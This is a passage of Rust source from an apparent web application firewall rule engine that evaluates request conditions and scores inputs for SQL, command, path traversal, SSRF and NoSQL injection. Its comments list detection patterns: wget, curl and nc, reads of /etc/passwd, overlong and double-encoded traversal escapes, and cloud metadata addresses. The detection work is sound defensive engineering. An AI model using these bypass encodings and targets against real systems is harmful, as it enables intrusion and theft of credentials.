790                        .and_then(|m| m.as_cond())
791                        .map(|child| {
792                            self.eval_condition(
793                                child,
794                                ctx,
795                                Some(&lowered),
796                                trace,
797                                rule_id,
798                                depth + 1,
799                            )
800                        })
801                        .unwrap_or(true)
802                }
803                None => false,
804            },
805            "percent_decode" => match value {
806                Some(v) => {
807                    let decoded = safe_percent_decode(v);
808                    condition
809                        .match_value
810                        .as_ref()
811                        .and_then(|m| m.as_cond())
812                        .map(|child| {
813                            self.eval_condition(
814                                child,
815                                ctx,
816                                Some(&decoded),
817                                trace,
818                                rule_id,
819                                depth + 1,
820                            )
821                        })
822                        .unwrap_or(false)
823                }
824                None => false,
825            },
826            "decode_if_base64" => match value {
827                Some(v) => {
828                    let decoded = decode_if_base64(v);
829                    condition
830                        .match_value
831                        .as_ref()
832                        .and_then(|m| m.as_cond())
833                        .map(|child| {
834                            self.eval_condition(
835                                child,
836                                ctx,
837                                Some(&decoded),
838                                trace,
839                                rule_id,
840                                depth + 1,
841                            )
842                        })
843                        .unwrap_or(false)
844                }
845                None => false,
846            },
847            "request" => {
848                let raw = build_raw_request(ctx);
849                condition
850                    .match_value
851                    .as_ref()
852                    .and_then(|m| m.as_cond())
853                    .map(|child| {
854                        self.eval_condition(child, ctx, Some(&raw), trace, rule_id, depth + 1)
855                    })
856                    .unwrap_or(false)
857            }
858            "request_json" => match ctx.json_text.as_deref() {
859                Some(json_text) => condition
860                    .match_value
861                    .as_ref()
862                    .and_then(|m| m.as_cond())
863                    .map(|child| {
864                        self.eval_condition(child, ctx, Some(json_text), trace, rule_id, depth + 1)
865                    })
866                    .unwrap_or(true),
867                None => false,
868            },
869            "static_content" => condition
870                .match_value
871                .as_ref()
872                .and_then(|m| m.as_bool())
873                .map(|target| ctx.is_static == target)
874                .unwrap_or(false),
875            "compare" => eval_compare(condition, value),
876            "count_odd" => eval_count_odd(condition.match_value.as_ref(), value),
877            "sql_analyzer" => self.eval_sql_analyzer(condition, value, ctx, trace, rule_id, depth),
878            "xss_analyzer" => self.eval_xss_analyzer(condition, value, ctx, trace, rule_id, depth),
879            "cmd_analyzer" => self.eval_cmd_analyzer(condition, value, ctx, trace, rule_id, depth),
880            "path_traversal_analyzer" => {
881                self.eval_path_traversal_analyzer(condition, value, ctx, trace, rule_id, depth)
882            }
883            "ssrf_analyzer" => {
884                self.eval_ssrf_analyzer(condition, value, ctx, trace, rule_id, depth)
885            }
886            "nosql_analyzer" => {
887                self.eval_nosql_analyzer(condition, value, ctx, trace, rule_id, depth)
888            }
889            "hashset" => eval_hashset(condition.match_value.as_ref(), value),
890            "parse_multipart" => self.eval_parse_multipart(condition, ctx, trace, rule_id, depth),
891            "track_by_ip" => self.eval_track_by_ip(condition, ctx, trace, rule_id, depth),
892            "extract_argument" => self.eval_extract_argument(condition, ctx, trace, rule_id, depth),
893            "unique_count" => {
894                self.eval_unique_count(condition, ctx, value, &[], trace, rule_id, depth)
895            }
896            "count" => self.eval_count(condition, ctx, trace, rule_id, depth),
897            "remember_match" => condition
898                .match_value
899                .as_ref()
900                .and_then(|m| m.as_cond())
901                .map(|child| self.eval_condition(child, ctx, value, trace, rule_id, depth + 1))
902                .unwrap_or(false),
903            _ => false,
904        };
905
906        if trace.is_enabled() {
907            trace.emit(TraceEvent::ConditionEvaluated {
908                rule_id,
909                kind: condition.kind.clone(),
910                field: condition.field.clone(),
911                op: condition.op.clone(),
912                name: condition.name.clone(),
913                matched,
914            });
915        }
916
917        matched
918    }
919
920    fn eval_boolean(
921        &self,
922        condition: &MatchCondition,
923        ctx: &EvalContext,
924        value: Option<&str>,
925        trace: &mut TraceState,
926        rule_id: u32,
927        depth: u32,
928    ) -> bool {
929        let op = condition.op.as_deref().unwrap_or("and");
930        let Some(match_value) = condition.match_value.as_ref() else {
931            return true;
932        };
933
934        match op {
935            "and" => {
936                if let Some(items) = match_value.as_arr() {
937                    for item in items {
938                        let Some(child) = item.as_cond() else {
939                            continue;
940                        };
941                        if !self.eval_condition(child, ctx, value, trace, rule_id, depth + 1) {
942                            return false;
943                        }
944                    }
945                    true
946                } else if let Some(child) = match_value.as_cond() {
947                    self.eval_condition(child, ctx, value, trace, rule_id, depth + 1)
948                } else {
949                    true
950                }
951            }
952            "or" => {
953                let mut saw_operand = false;
954                if let Some(items) = match_value.as_arr() {
955                    for item in items {
956                        let Some(child) = item.as_cond() else {
957                            continue;
958                        };
959                        saw_operand = true;
960                        if self.eval_condition(child, ctx, value, trace, rule_id, depth + 1) {
961                            return true;
962                        }
963                    }
964                    !saw_operand
965                } else if let Some(child) = match_value.as_cond() {
966                    self.eval_condition(child, ctx, value, trace, rule_id, depth + 1)
967                } else {
968                    true
969                }
970            }
971            "not" => {
972                if let Some(items) = match_value.as_arr() {
973                    for item in items {
974                        let Some(child) = item.as_cond() else {
975                            continue;
976                        };
977                        if self.eval_condition(child, ctx, value, trace, rule_id, depth + 1) {
978                            return false;
979                        }
980                    }
981                    true
982                } else if let Some(child) = match_value.as_cond() {
983                    !self.eval_condition(child, ctx, value, trace, rule_id, depth + 1)
984                } else {
985                    true
986                }
987            }
988            _ => false,
989        }
990    }
991
992    fn eval_method(
993        &self,
994        condition: &MatchCondition,
995        ctx: &EvalContext,
996        trace: &mut TraceState,
997        rule_id: u32,
998        depth: u32,
999    ) -> bool {
1000        let method = ctx.method;
1001        let Some(match_value) = condition.match_value.as_ref() else {
1002            return false;
1003        };
1004        if let Some(s) = match_value.as_str() {
1005            return method.eq_ignore_ascii_case(s);
1006        }
1007        if let Some(arr) = match_value.as_arr() {
1008            for item in arr {
1009                if let Some(s) = item.as_str() {
1010                    if method.eq_ignore_ascii_case(s) {
1011                        return true;
1012                    }
1013                }
1014            }
1015            return false;
1016        }
1017        if let Some(child) = match_value.as_cond() {
1018            return self.eval_condition(child, ctx, Some(method), trace, rule_id, depth + 1);
1019        }
1020        false
1021    }
1022
1023    fn eval_uri(
1024        &self,
1025        condition: &MatchCondition,
1026        ctx: &EvalContext,
1027        trace: &mut TraceState,
1028        rule_id: u32,
1029        depth: u32,
1030    ) -> bool {
1031        let uri = ctx.url;
1032        let Some(match_value) = condition.match_value.as_ref() else {
1033            return false;
1034        };
1035        if let Some(s) = match_value.as_str() {
1036            return uri.contains(s);
1037        }
1038        if let Some(child) = match_value.as_cond() {
1039            return self.eval_condition(child, ctx, Some(uri), trace, rule_id, depth + 1);
1040        }
1041        false
1042    }
1043
1044    fn eval_args(
1045        &self,
1046        condition: &MatchCondition,
1047        ctx: &EvalContext,
1048        trace: &mut TraceState,
1049        rule_id: u32,
1050        depth: u32,
1051    ) -> bool {
1052        let Some(child) = condition.match_value.as_ref().and_then(|m| m.as_cond()) else {
1053            return false;
1054        };
1055        for candidate in &ctx.args {
1056            if self.eval_condition(child, ctx, Some(candidate), trace, rule_id, depth + 1) {
1057                return true;
1058            }
1059        }
1060        false
1061    }
1062
1063    fn eval_named_argument(
1064        &self,
1065        condition: &MatchCondition,
1066        ctx: &EvalContext,
1067        trace: &mut TraceState,
1068        rule_id: u32,
1069        depth: u32,
1070    ) -> bool {
1071        let Some(child) = condition.match_value.as_ref().and_then(|m| m.as_cond()) else {
1072            return false;
1073        };
1074        let name = condition.name.as_deref().unwrap_or("*");
1075        for entry in &ctx.arg_entries {
1076            if (name == "*" || entry.key == name)
1077                && self.eval_condition(child, ctx, Some(&entry.value), trace, rule_id, depth + 1)
1078            {
1079                return true;
1080            }
1081        }
1082        false
1083    }
1084
1085    fn eval_header(
1086        &self,
1087        condition: &MatchCondition,
1088        ctx: &EvalContext,
1089        trace: &mut TraceState,
1090        rule_id: u32,
1091        depth: u32,
1092    ) -> bool {
1093        if let Some(direction) = condition.direction.as_deref() {
1094            if direction != "c2s" {
1095                return false;
1096            }
1097        }
1098        let Some(field) = condition.field.as_deref() else {
1099            return false;
1100        };
1101        let header_value = get_header_value(&ctx.headers, field);
1102        let Some(header_value) = header_value else {
1103            return false;
1104        };
1105        if condition.match_value.is_none() {
1106            return true;
1107        }
1108        let Some(child) = condition.match_value.as_ref().and_then(|m| m.as_cond()) else {
1109            return false;
1110        };
1111        self.eval_condition(child, ctx, Some(header_value), trace, rule_id, depth + 1)
1112    }
1113
1114    fn eval_regex(&self, match_value: Option<&MatchValue>, value: Option<&str>) -> bool {
1115        let Some(value) = value else {
1116            return false;
1117        };
1118        let Some(pattern) = match_value.and_then(|m| m.as_str()) else {
1119            return false;
1120        };
1121        let Some(re) = self.regex_cache.get(pattern) else {
1122            return false;
1123        };
1124        re.is_match(value)
1125    }
1126
1127    fn eval_word(&self, match_value: Option<&MatchValue>, value: Option<&str>) -> bool {
1128        let Some(value) = value else {
1129            return false;
1130        };
1131        let Some(word) = match_value.and_then(|m| m.as_str()) else {
1132            return false;
1133        };
1134        if let Some(re) = self.word_regex_cache.get(word) {
1135            return re.is_match(value);
1136        }
1137        // Fallback
1138        let pattern = format!(r"(?i)\b{}\b", regex::escape(word));
1139        let Ok(re) = RegexBuilder::new(&pattern).multi_line(true).build() else {
1140            return false;
1141        };
1142        re.is_match(value)
1143    }
1144
1145    fn eval_sql_analyzer(
1146        &self,
1147        condition: &MatchCondition,
1148        value: Option<&str>,
1149        ctx: &EvalContext,
1150        trace: &mut TraceState,
1151        rule_id: u32,
1152        depth: u32,
1153    ) -> bool {
1154        let Some(value) = value else {
1155            return false;
1156        };
1157        let score = sql_analyzer_score(value);
1158        match condition.match_value.as_ref().and_then(|m| m.as_cond()) {
1159            Some(child) => self.eval_condition(
1160                child,
1161                ctx,
1162                Some(&score.to_string()),
1163                trace,
1164                rule_id,
1165                depth + 1,
1166            ),
1167            None => score > 0,
1168        }
1169    }
1170
1171    fn eval_xss_analyzer(
1172        &self,
1173        condition: &MatchCondition,
1174        value: Option<&str>,
1175        ctx: &EvalContext,
1176        trace: &mut TraceState,
1177        rule_id: u32,
1178        depth: u32,
1179    ) -> bool {
1180        let Some(value) = value else {
1181            return false;
1182        };
1183        let score = xss_analyzer_score(value);
1184        match condition.match_value.as_ref().and_then(|m| m.as_cond()) {
1185            Some(child) => self.eval_condition(
1186                child,
1187                ctx,
1188                Some(&score.to_string()),
1189                trace,
1190                rule_id,
1191                depth + 1,
1192            ),
1193            None => score > 0,
1194        }
1195    }
1196
1197    fn eval_cmd_analyzer(
1198        &self,
1199        condition: &MatchCondition,
1200        value: Option<&str>,
1201        ctx: &EvalContext,
1202        trace: &mut TraceState,
1203        rule_id: u32,
1204        depth: u32,
1205    ) -> bool {
1206        let Some(value) = value else {
1207            return false;
1208        };
1209        let score = cmd_analyzer_score(value);
1210        match condition.match_value.as_ref().and_then(|m| m.as_cond()) {
1211            Some(child) => self.eval_condition(
1212                child,
1213                ctx,
1214                Some(&score.to_string()),
1215                trace,
1216                rule_id,
1217                depth + 1,
1218            ),
1219            None => score > 0,
1220        }
1221    }
1222
1223    fn eval_path_traversal_analyzer(
1224        &self,
1225        condition: &MatchCondition,
1226        value: Option<&str>,
1227        ctx: &EvalContext,
1228        trace: &mut TraceState,
1229        rule_id: u32,
1230        depth: u32,
1231    ) -> bool {
1232        let Some(value) = value else {
1233            return false;
1234        };
1235        let score = path_traversal_analyzer_score(value);
1236        match condition.match_value.as_ref().and_then(|m| m.as_cond()) {
1237            Some(child) => self.eval_condition(
1238                child,
1239                ctx,
1240                Some(&score.to_string()),
1241                trace,
1242                rule_id,
1243                depth + 1,
1244            ),
1245            None => score > 0,
1246        }
1247    }
1248
1249    /// Evaluate SSRF analyzer condition.
1250    ///
1251    /// SECURITY: Detects Server-Side Request Forgery attempts targeting internal
1252    /// services, cloud metadata endpoints, and dangerous URL schemes.
1253    fn eval_ssrf_analyzer(
1254        &self,
1255        condition: &MatchCondition,
1256        value: Option<&str>,
1257        ctx: &EvalContext,
1258        trace: &mut TraceState,
1259        rule_id: u32,
1260        depth: u32,
1261    ) -> bool {
1262        let Some(value) = value else {
1263            return false;
1264        };
1265        let score = ssrf_analyzer_score(value);
1266        match condition.match_value.as_ref().and_then(|m| m.as_cond()) {
1267            Some(child) => self.eval_condition(
1268                child,
1269                ctx,
1270                Some(&score.to_string()),
1271                trace,
1272                rule_id,
1273                depth + 1,
1274            ),
1275            None => score > 0,
1276        }
1277    }
1278
1279    /// Evaluate NoSQL injection analyzer condition.
1280    ///
1281    /// SECURITY: Detects NoSQL injection attempts targeting MongoDB, CouchDB,
1282    /// Redis, Cassandra, and other document/key-value stores.
1283    fn eval_nosql_analyzer(
1284        &self,
1285        condition: &MatchCondition,
1286        value: Option<&str>,
1287        ctx: &EvalContext,
1288        trace: &mut TraceState,
1289        rule_id: u32,
1290        depth: u32,
1291    ) -> bool {
1292        let Some(value) = value else {
1293            return false;
1294        };
1295        let score = nosql_analyzer_score(value);
1296        match condition.match_value.as_ref().and_then(|m| m.as_cond()) {
1297            Some(child) => self.eval_condition(
1298                child,
1299                ctx,
1300                Some(&score.to_string()),
1301                trace,
1302                rule_id,
1303                depth + 1,
1304            ),
1305            None => score > 0,
1306        }
1307    }
1308
1309    fn eval_parse_multipart(
1310        &self,
1311        condition: &MatchCondition,
1312        ctx: &EvalContext,
1313        trace: &mut TraceState,
1314        rule_id: u32,
1315        depth: u32,
1316    ) -> bool {
1317        let Some(child) = condition.match_value.as_ref().and_then(|m| m.as_cond()) else {
1318            return false;
1319        };
1320        let raw_bytes: &[u8] = if let Some(body_text) = ctx.body_text {
1321            body_text.as_bytes()
1322        } else if let Some(raw) = ctx.raw_body {
1323            raw
1324        } else {
1325            return false;
1326        };
1327        let content_type = ctx.headers.get("content-type").copied().unwrap_or("");
1328        let Some(boundary) = extract_multipart_boundary(content_type) else {
1329            return false;
1330        };
1331        let values = parse_multipart_values(raw_bytes, &boundary);
1332        for part_value in &values {
1333            if self.eval_condition(child, ctx, Some(part_value), trace, rule_id, depth + 1) {
1334                return true;
1335            }
1336        }
1337        false
1338    }
1339
1340    fn eval_track_by_ip(
1341        &self,
1342        condition: &MatchCondition,
1343        ctx: &EvalContext,
1344        trace: &mut TraceState,
1345        rule_id: u32,
1346        depth: u32,
1347    ) -> bool {
1348        let Some(child) = condition.match_value.as_ref().and_then(|m| m.as_cond()) else {
1349            return false;
1350        };
1351        self.process_track_condition(child, ctx, Vec::new(), trace, rule_id, depth + 1)
1352    }
1353
1354    fn eval_extract_argument(
1355        &self,
1356        condition: &MatchCondition,
1357        ctx: &EvalContext,
1358        trace: &mut TraceState,
1359        rule_id: u32,
1360        depth: u32,
1361    ) -> bool {
1362        let selector = condition.selector.as_deref();
1363        let extracted = select_argument_values(self, selector, ctx);
1364        if extracted.is_empty() {
1365            return false;
1366        }
1367        match condition.match_value.as_ref().and_then(|m| m.as_cond()) {
1368            Some(child) => {
1369                self.process_track_condition(child, ctx, extracted, trace, rule_id, depth + 1)
1370            }
1371            None => true,
1372        }
1373    }
1374
1375    fn eval_unique_count(
1376        &self,
1377        condition: &MatchCondition,
1378        ctx: &EvalContext,
1379        value: Option<&str>,
1380        values: &[String],
1381        trace: &mut TraceState,
1382        rule_id: u32,
1383        depth: u32,
1384    ) -> bool {
1385        let timeframe = condition.timeframe.unwrap_or(60);
1386        let trace_label = "unique_count";
1387
1388        let values_to_record: Vec<String> = if !values.is_empty() {
1389            values.to_vec()
1390        } else if let Some(v) = value {
1391            vec![v.to_string()]
1392        } else {
1393            Vec::new()
1394        };
1395
1396        let unique_count = {
1397            let mut store = self.store.write();
1398            if values_to_record.is_empty() {
1399                store.get_unique_count(ctx.ip, trace_label, timeframe)
1400            } else {
1401                store.record_unique_values(ctx.ip, trace_label, &values_to_record, timeframe)
1402            }
1403        };
1404
1405        if let Some(mv) = condition.match_value.as_ref() {
1406            if let Some(child) = mv.as_cond() {
1407                return self.eval_condition(
1408                    child,
1409                    ctx,
1410                    Some(&unique_count.to_string()),
1411                    trace,
1412                    rule_id,
1413                    depth + 1,
1414                );
1415            }
1416            if let Some(num) = mv.as_num() {
1417                return unique_count as f64 >= num;
1418            }
1419        }
1420
1421        if let Some(count) = condition.count {
1422            unique_count as u64 >= count
1423        } else {
1424            unique_count > 0
1425        }
1426    }
1427
1428    fn eval_count(
1429        &self,
1430        condition: &MatchCondition,
1431        ctx: &EvalContext,
1432        trace: &mut TraceState,
1433        rule_id: u32,
1434        depth: u32,
1435    ) -> bool {
1436        let timeframe = condition.timeframe.unwrap_or(60);
1437        let trace_label = "count";
1438
1439        if let Some(child) = condition.match_value.as_ref().and_then(|m| m.as_cond()) {
1440            if !self.eval_condition(child, ctx, None, trace, rule_id, depth + 1) {
1441                return false;
1442            }
1443        }
1444
1445        let count = {
1446            let mut store = self.store.write();
1447            store.record_event(ctx.ip, trace_label, timeframe)
1448        };
1449
1450        let threshold = condition.count.unwrap_or(1);
1451        count as u64 >= threshold
1452    }
1453
1454    fn process_track_condition(
1455        &self,
1456        condition: &MatchCondition,
1457        ctx: &EvalContext,
1458        values: Vec<String>,
1459        trace: &mut TraceState,
1460        rule_id: u32,
1461        depth: u32,
1462    ) -> bool {
1463        match condition.kind.as_str() {
1464            "extract_argument" => {
1465                let selector = condition.selector.as_deref();
1466                let extracted = select_argument_values(self, selector, ctx);
1467                if extracted.is_empty() {
1468                    return false;
1469                }
1470                match condition.match_value.as_ref().and_then(|m| m.as_cond()) {
1471                    Some(child) => self.process_track_condition(
1472                        child,
1473                        ctx,
1474                        extracted,
1475                        trace,
1476                        rule_id,
1477                        depth + 1,
1478                    ),
1479                    None => {
1480                        let mut store = self.store.write();
1481                        store.record_unique_values(ctx.ip, "extract", &extracted, 60);
1482                        true
1483                    }
1484                }
1485            }
1486            "unique_count" => {
1487                self.eval_unique_count(condition, ctx, None, &values, trace, rule_id, depth + 1)
1488            }
1489            "count" => self.eval_count(condition, ctx, trace, rule_id, depth + 1),
1490            _ => {
1491                let candidate = values.first().map(|s| s.as_str());
1492                self.eval_condition(condition, ctx, candidate, trace, rule_id, depth + 1)
1493            }
1494        }
1495    }
1496}
1497
1498// Helper functions
1499
1500fn compute_available_features(ctx: &EvalContext) -> u16 {
1501    let mut out = 0u16;
1502    if !ctx.args.is_empty() {
1503        out |= REQ_ARGS;
1504    }
1505    if !ctx.arg_entries.is_empty() {
1506        out |= REQ_ARG_ENTRIES;
1507    }
1508    let has_body = ctx.body_text.is_some() || ctx.raw_body.is_some();
1509    if has_body {
1510        out |= REQ_BODY;
1511    }
1512    if ctx.json_text.is_some() {
1513        out |= REQ_JSON;
1514    }
1515    out
1516}
1517
1518fn compute_request_header_mask(index: &RuleIndex, headers: &HashMap<String, &str>) -> u64 {
1519    let mut mask = 0u64;
1520    for (bit, header) in index.header_bits.iter().enumerate() {
1521        if bit >= 64 {
1522            break;
1523        }
1524        if headers.contains_key(header) {
1525            mask |= 1u64 << bit;
1526        }
1527    }
1528    mask
1529}
1530
/// Looks up a header value by name.
///
/// The ASCII-lowercased form of `field` is tried first; if that key is absent,
/// `field` is tried exactly as given. Returns `None` when neither key exists.
fn get_header_value<'a>(headers: &'a HashMap<String, &'a str>, field: &str) -> Option<&'a str> {
    let lowered = field.to_ascii_lowercase();
    match headers.get(lowered.as_str()) {
        Some(found) => Some(*found),
        None => headers.get(field).copied(),
    }
}
1538
1539fn eval_contains(match_value: Option<&MatchValue>, value: Option<&str>) -> bool {
1540    let Some(value) = value else {
1541        return false;
1542    };
1543    let Some(s) = match_value.and_then(|m| m.as_str()) else {
1544        return false;
1545    };
1546    value.contains(s)
1547}
1548
1549fn eval_starts_with(match_value: Option<&MatchValue>, value: Option<&str>) -> bool {
1550    let Some(value) = value else {
1551        return false;
1552    };
1553    let Some(s) = match_value.and_then(|m| m.as_str()) else {
1554        return false;
1555    };
1556    value.starts_with(s)
1557}
1558
1559fn eval_equals(match_value: Option<&MatchValue>, value: Option<&str>) -> bool {
1560    let Some(value) = value else {
1561        return false;
1562    };
1563    let Some(s) = match_value.and_then(|m| m.as_str()) else {
1564        return false;
1565    };
1566    value == s
1567}
1568
1569fn eval_multiple_contains(match_value: Option<&MatchValue>, value: Option<&str>) -> bool {
1570    let Some(value) = value else {
1571        return false;
1572    };
1573    let Some(arr) = match_value.and_then(|m| m.as_arr()) else {
1574        return false;
1575    };
1576    for item in arr {
1577        if let Some(s) = item.as_str() {
1578            if value.contains(s) {
1579                return true;
1580            }
1581        }
1582    }
1583    false
1584}
1585
1586fn eval_hashset(match_value: Option<&MatchValue>, value: Option<&str>) -> bool {
1587    let Some(value) = value else {
1588        return false;
1589    };
1590    let Some(arr) = match_value.and_then(|m| m.as_arr()) else {
1591        return false;
1592    };
1593    for item in arr {
1594        if let Some(s) = item.as_str() {
1595            if s.eq_ignore_ascii_case(value) {
1596                return true;
1597            }
1598        }
1599    }
1600    false
1601}
1602
1603fn eval_compare(condition: &MatchCondition, candidate: Option<&str>) -> bool {
1604    let Some(candidate) = candidate else {
1605        return false;
1606    };
1607    let Ok(candidate_num) = candidate.parse::<f64>() else {
1608        return false;
1609    };
1610    let Some(target) = condition.match_value.as_ref().and_then(|m| m.as_num()) else {
1611        return false;
1612    };
1613    let op = condition.op.as_deref().unwrap_or("eq");
1614    match op {
1615        "gte" => candidate_num >= target,
1616        "lte" => candidate_num <= target,
1617        "gt" => candidate_num > target,
1618        "lt" => candidate_num < target,
1619        "eq" => candidate_num == target,
1620        _ => false,
1621    }
1622}
1623
1624fn eval_count_odd(match_value: Option<&MatchValue>, value: Option<&str>) -> bool {
1625    let Some(value) = value else {
1626        return false;
1627    };
1628    let Some(needle) = match_value.and_then(|m| m.as_str()) else {
1629        return false;
1630    };
1631    if needle.is_empty() {
1632        return false;
1633    }
1634    let count = value.matches(needle).count();
1635    count % 2 == 1
1636}
1637
1638fn sql_analyzer_score(value: &str) -> u32 {
1639    if SQL_KEYWORDS.is_match(value)
1640        || SQL_PHRASES.is_match(value)
1641        || SQL_OR_AND_EQ.is_match(value)
1642        || SQL_COMMENT_1.is_match(value)
1643        || SQL_COMMENT_2.is_match(value)
1644        || SQL_SHUTDOWN.is_match(value)
1645    {
1646        1
1647    } else {
1648        0
1649    }
1650}
1651
1652/// Analyzes a value for command injection patterns.
1653///
1654/// SECURITY: Detects OS command injection attempts including:
1655/// - Backtick command execution: `cmd`
1656/// - Subshell command substitution: $(cmd)
1657/// - Variable substitution: ${IFS}, ${PATH}
1658/// - Newline injection: %0a, %0d, literal newlines
1659/// - Command chaining: ; | && ||
1660/// - Brace expansion: {cmd1,cmd2}
1661/// - Dangerous commands: cat /etc/passwd, wget, curl, nc, etc.
1662/// - Redirection: > >> < 2>&1
1663/// - Null byte injection: %00
1664fn cmd_analyzer_score(value: &str) -> u32 {
1665    // First check the raw value
1666    if check_cmd_patterns(value) {
1667        return 1;
1668    }
1669
1670    // URL-decode and check again (handles %0a, %00, etc.)
1671    let decoded = safe_percent_decode(value);
1672    if decoded != value && check_cmd_patterns(&decoded) {
1673        return 1;
1674    }
1675
1676    // Double-decode for nested encoding
1677    if decoded.contains('%') {
1678        let double_decoded = safe_percent_decode(&decoded);
1679        if double_decoded != decoded && check_cmd_patterns(&double_decoded) {
1680            return 1;
1681        }
1682    }
1683
1684    0
1685}
1686
1687/// Check command injection patterns against a value.
1688///
1689/// Returns true if any command injection pattern is detected.
1690/// The patterns are ordered roughly by severity/likelihood.
1691#[inline]
1692fn check_cmd_patterns(value: &str) -> bool {
1693    // High-severity patterns (definite command injection)
1694    CMD_BACKTICK.is_match(value)
1695        || CMD_SUBSHELL.is_match(value)
1696        || CMD_DANGEROUS.is_match(value)
1697        // IFS manipulation (common bypass)
1698        || CMD_IFS.is_match(value)
1699        // Variable substitution (${var})
1700        || CMD_VAR_SUBST.is_match(value)
1701        // Newline injection (decoded)
1702        || CMD_NEWLINE_LITERAL.is_match(value)
1703        // Encoded newlines (not yet decoded)
1704        || CMD_NEWLINE_ENCODED.is_match(value)
1705        // Null byte injection
1706        || CMD_NULL_BYTE.is_match(value)
1707        // Brace expansion
1708        || CMD_BRACE.is_match(value)
1709        // Command chaining (be careful: could match URLs with &&)
1710        // Only flag if combined with other suspicious patterns
1711        || (CMD_CHAIN.is_match(value) && has_cmd_context(value))
1712        // Redirection with command context
1713        || (CMD_REDIRECT.is_match(value) && has_cmd_context(value))
1714        // Path traversal with command context
1715        || (CMD_PATH_TRAVERSAL.is_match(value) && has_cmd_context(value))
1716}
1717
1718/// Check if value has command execution context (to reduce false positives).
1719#[inline]
1720fn has_cmd_context(value: &str) -> bool {
1721    // Look for signs of command execution context
1722    value.contains('`')
1723        || value.contains("$(")
1724        || value.contains("${")
1725        || CMD_DANGEROUS.is_match(value)
1726        || value.contains("/bin/")
1727        || value.contains("/usr/bin/")
1728        || value.contains("/etc/")
1729        || value.contains("/tmp/")
1730        || value.contains("/dev/")
1731}
1732
1733/// Analyzes a value for path traversal patterns.
1734///
1735/// SECURITY: Detects directory traversal attacks including:
1736/// - Basic: ../, ..\
1737/// - URL-encoded: %2e%2e%2f
1738/// - Double-encoded: %252e%252e%252f
1739/// - Unicode/overlong UTF-8: %c0%ae, %c0%af
1740/// - Null byte truncation: %00
1741/// - Sensitive file targets: /etc/passwd, boot.ini
1742fn path_traversal_analyzer_score(value: &str) -> u32 {
1743    // First check the raw value
1744    if check_path_traversal_patterns(value) {
1745        return 1;
1746    }
1747
1748    // URL-decode and check again
1749    let decoded = safe_percent_decode(value);
1750    if decoded != value && check_path_traversal_patterns(&decoded) {
1751        return 1;
1752    }
1753
1754    // Double-decode for nested encoding bypass
1755    if decoded.contains('%') {
1756        let double_decoded = safe_percent_decode(&decoded);
1757        if double_decoded != decoded && check_path_traversal_patterns(&double_decoded) {
1758            return 1;
1759        }
1760
1761        // Triple-decode for extreme cases
1762        if double_decoded.contains('%') {
1763            let triple_decoded = safe_percent_decode(&double_decoded);
1764            if triple_decoded != double_decoded && check_path_traversal_patterns(&triple_decoded) {
1765                return 1;
1766            }
1767        }
1768    }
1769
1770    // Check for Unicode normalization bypasses
1771    let normalized = normalize_unicode_path(value);
1772    if normalized != value && check_path_traversal_patterns(&normalized) {
1773        return 1;
1774    }
1775
1776    0
1777}
1778
1779/// Check path traversal patterns against a value.
1780#[inline]
1781fn check_path_traversal_patterns(value: &str) -> bool {
1782    // Basic patterns
1783    PATH_TRAV_BASIC.is_match(value)
1784        // URL-encoded patterns (check even on decoded values for partial encoding)
1785        || PATH_TRAV_ENCODED.is_match(value)
1786        // Double-encoded patterns
1787        || PATH_TRAV_DOUBLE.is_match(value)
1788        // Unicode/overlong UTF-8 patterns
1789        || PATH_TRAV_UNICODE.is_match(value)
1790        // Backslash variants
1791        || PATH_TRAV_BACKSLASH.is_match(value)
1792        // Null byte injection
1793        || PATH_TRAV_NULL.is_match(value)
1794        // Sensitive targets (only if path traversal context present)
1795        || (has_traversal_context(value) && check_sensitive_targets(value))
1796}
1797
/// Reports whether `value` contains a marker of path traversal context.
///
/// A marker is a literal `..`, a percent-encoded dot (`%2e` / `%2E`), or the
/// lead byte of an overlong UTF-8 escape (`%c0` / `%C0`).
#[inline]
fn has_traversal_context(value: &str) -> bool {
    const MARKERS: [&str; 5] = ["..", "%2e", "%2E", "%c0", "%C0"];

    MARKERS.iter().any(|marker| value.contains(*marker))
}
1807
1808/// Check for sensitive file targets.
1809#[inline]
1810fn check_sensitive_targets(value: &str) -> bool {
1811    PATH_TRAV_TARGETS_UNIX.is_match(value) || PATH_TRAV_TARGETS_WIN.is_match(value)
1812}
1813
/// Normalize Unicode/overlong UTF-8 encoded paths.
///
/// Rewrites the percent-escaped overlong encodings commonly used to smuggle
/// path characters past filters:
/// - `%c0%ae`, `%c0%2e`, `%e0%80%ae` -> `.`
/// - `%c0%af`, `%e0%80%af` -> `/`
/// - `%c1%9c`, `%c1%1c` -> `\`
///
/// SECURITY: hex digits are matched case-insensitively, so mixed-case
/// spellings such as `%C0%ae` are normalized as well. Every other character
/// of `value` is copied through unchanged.
fn normalize_unicode_path(value: &str) -> String {
    /// Lowercase escape sequence and the character it stands for.
    const OVERLONG: [(&str, char); 7] = [
        ("%c0%ae", '.'),
        ("%c0%2e", '.'),
        ("%e0%80%ae", '.'),
        ("%c0%af", '/'),
        ("%e0%80%af", '/'),
        ("%c1%9c", '\\'),
        ("%c1%1c", '\\'),
    ];

    if !value.contains('%') {
        return value.to_string();
    }

    // ASCII lowercasing never changes byte offsets, so positions found in
    // `folded` index `value` directly.
    let folded = value.to_ascii_lowercase();
    let mut result = String::with_capacity(value.len());
    let mut pos = 0;

    while let Some(offset) = folded[pos..].find('%') {
        let start = pos + offset;
        result.push_str(&value[pos..start]);

        let hit = OVERLONG
            .iter()
            .find(|(pattern, _)| folded[start..].starts_with(*pattern));
        match hit {
            Some((pattern, replacement)) => {
                result.push(*replacement);
                pos = start + pattern.len();
            }
            None => {
                // Not one of the known escapes: keep the '%' and move on.
                result.push('%');
                pos = start + 1;
            }
        }
    }

    result.push_str(&value[pos..]);
    result
}
1848
1849/// Analyzes a value for SSRF (Server-Side Request Forgery) patterns.
1850///
1851/// SECURITY: Detects SSRF attempts targeting:
1852/// - Localhost (127.0.0.1, ::1)
1853/// - Cloud metadata endpoints (169.254.169.254, metadata.google.internal)
1854/// - Private IP ranges (10.x.x.x, 192.168.x.x, 172.16-31.x.x)
1855/// - IPv6-mapped IPv4 bypass attempts (::ffff:127.0.0.1)
1856/// - Dangerous URL schemes (file://, gopher://, dict://, etc.)
1857/// - Encoded IP bypasses (decimal, hex, octal representations)
1858///
1859/// Returns 1 if SSRF patterns are detected, 0 otherwise.
1860fn ssrf_analyzer_score(value: &str) -> u32 {
1861    // Check raw value first
1862    if check_ssrf_patterns(value) {
1863        return 1;
1864    }
1865
1866    // URL-decode and check again (handles %2f -> /, etc.)
1867    let decoded = safe_percent_decode(value);
